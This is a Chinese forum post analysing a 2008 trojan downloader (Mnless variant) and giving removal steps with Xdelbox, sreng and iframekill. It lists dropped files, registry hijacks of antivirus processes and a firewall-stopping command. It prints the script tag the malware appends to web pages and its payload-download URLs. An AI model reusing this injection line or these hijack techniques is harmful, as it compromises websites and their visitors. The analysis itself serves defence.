- 听众
- 收听
- 积分
- 2999
- 主题
- 回帖
- 0
- 精华
注册时间2006-7-29
最后登录1970-1-1
该用户从未签到
|
作者:清新阳光
警惕新的梅勒斯下载器变种(Trojan.Win32.Mnless.zyt)
这是最近比较流行的一个木马下载器,瑞星命名Trojan.Win32.Mnless.zyt,被挂马网站挂的几乎全是类似这样的下载器。
File: MicroSoft.pif
Size: 12739 bytes
Modified: 2008年1月11日, 23:32:54
MD5: 433C58E36CCC59CA47F56CEA300FCE7A
SHA1: 67F422ADCDE84B415219DFEDE7A2B9C3EAF0A7E1
CRC32: 948DB144
1.病毒运行后,衍生如下副本及文件
%systemroot%\system32\wxptdi.sys
%systemroot%\system32\tmipo.bat
2.启动一个空壳的userinit.exe,将病毒代码写入进去,然后自身退出
3.执行tmipo.bat的命令 net stop sharedaccess 结束系统自带的防火墙
4.病毒黑吃黑,对于logogo病毒独家“照顾”
会在HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下面创建ati2evxx.exe项目劫持到
%systemroot%\system32\svchost.exe
且在%systemroot%\Fonts\system\下面释放一个假的ati2evxx.exe 里面有如下几个字"risinidaye"
5.在HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\添加如下劫持项目劫持杀毒软件
avp.exe
Iparmor.exe
kavsvc.exe
KAVsvcUI.exe
KVFW.EXE.exe
KVMonXP.exe
KVsrvXP.exe
KVwsc.exe
navapsvc.exe
Navapw32.exe
PFW.exe
rav.exe
RAVmon.exe
RAVmonD.exe
ravtimer.exe
rising.exe
runiep.exe
指向%systemroot%\system32\svchost.exe
6.遍历非系统分区php jsp asp htm html文件
在其尾部加入
<script language=javascript src=http://*.biz/css.js></script>的代码
7通过FindWindowA函数查找带有“瑞星提示”的窗口,如果发现则发送消息关闭窗口
8.连接网络(userinit.exe)下载木马
读取http://list.eh7.biz/elf_listo.txt的下载列表
下载http://*.118.151/a1.exe
~http://*.118.151/a28.exe
到C:\Program Files下面
9.下载的几乎均为木马除此之外还有机器狗病毒
下载的木马有盗取如下游戏帐号的功能(包括但不限于)
完美世界
QQ幻想
传奇世界
QQ
破天一剑
QQ三国
大话西游
奇迹世界
...
且有如下功能
禁止Windows自动更新
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate: 0x00000001
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\AUOptions: 0x00000001
且会修改IE主页为HTtp://ww.94aK.cOM/ 并使得IE选项的主页设置失效
病毒木马植入完毕之后的sreng日志如下:
启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<WSockDrv32><C:\WINDOWS\WSockDrv32.exe> []
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<cmdbcs><C:\WINDOWS\cmdbcs.exe> []
<WinSysM><C:\WINDOWS\608769M.exe> []
<PTSShell><C:\WINDOWS\PTSShell.exe> []
<MsIMMs32><C:\WINDOWS\MsIMMs32.exE> []
<MsPrint32D><C:\WINDOWS\MsPrint32D.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exE> []
<WinSysW><C:\WINDOWS\608769L.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exE> []
<LotusHlp><C:\WINDOWS\LotusHlp.exe> []
<SHAProc><C:\WINDOWS\SHAProc.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{9963387B-212E-4643-B207-82DAEA0E713D}><C:\Program Files\Internet Explorer\PLUGINS\Wn_Sys8x.Sys> []
<{B960356A-458E-DE24-BD50-268F589A56AB}><C:\WINDOWS\Fonts\avwlkmn.dll> []
<{FD561258-45F3-A451-F908-A258458226DF}><C:\WINDOWS\Fonts\kvdxsoma.dll> []
<{55e2c04d-aef0-4b16-b0b6-fe53ac2ecfdc}><C:\WINDOWS\system32\IGB_DJOL_1009.dll> []
<{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}><C:\WINDOWS\Fonts\rsjzbpm.dll> []
<{3D098345-9012-8750-8910-9128098134D3}><C:\WINDOWS\Fonts\jsqxcyc.dll> []
IFEO项目
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ati2evxx.exe]
<IFEO[ati2evxx.exe]><C:\WINDOWS\system32\svchost.exe> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe]
<IFEO[avp.exe]><C:\WINDOWS\system32\svchost.exe> [(Verified)Microsoft Windows Publisher]
...
==================================
驱动程序
[mseqsy / mseqsy][Running/Auto Start]
<system32\DRIVERS\msacpe.sys><N/A>
[PciHardDisk / PciHardDisk][Stopped/Manual Start]
<\??\C:\WINDOWS\system32\fat32.sys><N/A>
==================================
浏览器加载项
[]
{9963387B-212E-4643-B207-82DAEA0E713D} <C:\Program Files\Internet Explorer\PLUGINS\Wn_Sys8x.Sys, N/A>
==================================
正在运行的进程
[PID: 1500][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\WSockDrv32.dll] [N/A, ]
[C:\WINDOWS\system32\LYMANGR.DLL] [N/A, ]
[C:\WINDOWS\system32\upxdnd.dll] [N/A, ]
[C:\Program Files\Internet Explorer\PLUGINS\Wn_Sys8x.Sys] [N/A, ]
[C:\WINDOWS\system32\cxofypfwow.dll] [Microsoft Corporation, 5.1.2600.3099]
[C:\WINDOWS\system32\cmdbcs.dll] [N/A, ]
[C:\WINDOWS\Fonts\avwlkmn.dll] [N/A, ]
[C:\WINDOWS\Fonts\kvdxsoma.dll] [N/A, ]
[C:\WINDOWS\608769MM.DLL] [N/A, ]
[C:\WINDOWS\system32\olcrkaowm.dll] [Microsoft Corporation, 5.1.2600.3099]
[C:\WINDOWS\system32\PTSShell.dll] [N/A, ]
[C:\WINDOWS\system32\MsIMMs32.dll] [N/A, ]
[C:\WINDOWS\system32\MsPrint32D.dll] [N/A, ]
[C:\WINDOWS\system32\AVPSrv.dll] [N/A, ]
[C:\WINDOWS\608769WL.DLL] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]
[C:\WINDOWS\system32\IGB_DJOL_1009.dll] [N/A, ]
[C:\WINDOWS\system32\lojcyqhzx.dll] [Microsoft Corporation, 5.1.2600.3099]
[C:\WINDOWS\system32\LotusHlp.dll] [N/A, ]
[C:\WINDOWS\Fonts\rsjzbpm.dll] [N/A, ]
[C:\WINDOWS\system32\SHAProc.dll] [N/A, ]
[C:\WINDOWS\Fonts\jsqxcyc.dll] [N/A, ]
解决方法:
(由于木马会随时更新,此查杀方法里面涉及的文件仅供参考)
下载Xdelbox:http://www.dodudou.com/down/里面的原创软件文件夹下
sreng:http://download.kztechs.com/files/sreng2.zip
1.解压Xdelbox所有文件到一个文件夹
复制如下文字 到剪贴板(本例假设系统盘在C盘)
C:\Program Files\Internet Explorer\PLUGINS\Sy_Win7k.Jmp
C:\Program Files\Internet Explorer\PLUGINS\Wn_Sys8x.Sys
C:\WINDOWS\608769L.exe
C:\WINDOWS\608769M.exe
C:\WINDOWS\608769MM.DLL
C:\WINDOWS\608769WL.DLL
C:\WINDOWS\AVPSrv.exE
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\Fonts\avwlkin.dll
C:\WINDOWS\Fonts\avwlkmn.dll
C:\WINDOWS\Fonts\avwlkst.exe
C:\WINDOWS\Fonts\jsqxcss.dll
C:\WINDOWS\Fonts\jsqxcyc.dll
C:\WINDOWS\Fonts\jsqxczc.exe
C:\WINDOWS\Fonts\kvdxsocf.dll
C:\WINDOWS\Fonts\kvdxsois.exe
C:\WINDOWS\Fonts\kvdxsoma.dll
C:\WINDOWS\Fonts\rsjzbfg.dll
C:\WINDOWS\Fonts\rsjzbpm.dll
C:\WINDOWS\Fonts\rsjzbsp.exe
C:\WINDOWS\Fonts\system\ati2evxx.exe
C:\WINDOWS\Kvsc3.exE
C:\WINDOWS\LotusHlp.exe
C:\WINDOWS\MsIMMs32.exE
C:\WINDOWS\MsPrint32D.exe
C:\WINDOWS\PTSShell.exe
C:\WINDOWS\SHAProc.exe
C:\WINDOWS\system32\auhad.dll
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\cxofypfwow.dll
C:\WINDOWS\system32\drivers\msacpe.sys
C:\WINDOWS\system32\FTCCompress.dll
C:\WINDOWS\system32\IGB_DJOL_1009.dll
C:\WINDOWS\system32\IGB_DJOL_1009.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\lojcyqhzx.dll
C:\WINDOWS\system32\LotusHlp.dll
C:\WINDOWS\system32\LYLOADER.EXE
C:\WINDOWS\system32\LYMANGR.DLL
C:\WINDOWS\system32\MSDEG32.DLL
C:\WINDOWS\system32\msepion.sys
C:\WINDOWS\system32\MsIMMs32.dll
C:\WINDOWS\system32\MsPrint32D.dll
C:\WINDOWS\system32\mswmkbs32.dll
C:\WINDOWS\system32\mszxccc32.dll
C:\WINDOWS\system32\olcrkaowm.dll
C:\WINDOWS\system32\PTSShell.dll
C:\WINDOWS\system32\SHAProc.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\WSockDrv32.dll
C:\WINDOWS\system32\wxptdi.sys
C:\WINDOWS\upxdnd.exe
C:\WINDOWS\WSockDrv32.exe
E:\AutoRun.exe
E:\AutoRun.Inf
打开Xdelbox.exe
在下面的大框中 单击右键 点击 “剪贴板导入不检查路径”
之后刚才复制的那个文件列表将出现在下面的大框中
然后再在下面的大框中单击右键 点击 “立即重启执行删除”
软件会自动重启计算机
重启计算机以后 会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
不用你管,它会自动选择进入第二个系统
类似dos的界面滚动完毕以后 病毒就被删除了
之后他会自动重启进入正常模式
2.重启之后
打开sreng 删除上述注册表启动项目 和驱动程序的相关项目
并删除所有IFEO项目
系统修复-Windows Shell/IE 全选 点击修复
3.使用iframekill修复受感染的htm等网页文件
http://www.vaid.cn/blog/attachment/iframekill.rar
使用方法:运行后 把需要清除的代码填入“要清除的网页代码”的框中 全盘扫描即可
 |
|
IP卡
狗仔卡
发表于 2008-1-16 00:29:39
提升卡
置顶卡
喧嚣卡
变色卡
抢沙发
显身卡